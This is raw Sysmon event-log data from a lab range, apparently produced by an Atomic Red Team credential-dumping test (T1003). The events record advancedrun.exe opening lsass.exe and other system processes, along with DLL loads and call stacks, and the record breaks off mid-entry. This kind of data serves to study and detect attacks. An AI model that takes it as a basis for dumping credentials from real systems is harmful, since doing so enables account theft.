17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003967214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.254{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.254{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003967207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
10341000x80000000000000003967198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003967197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® 
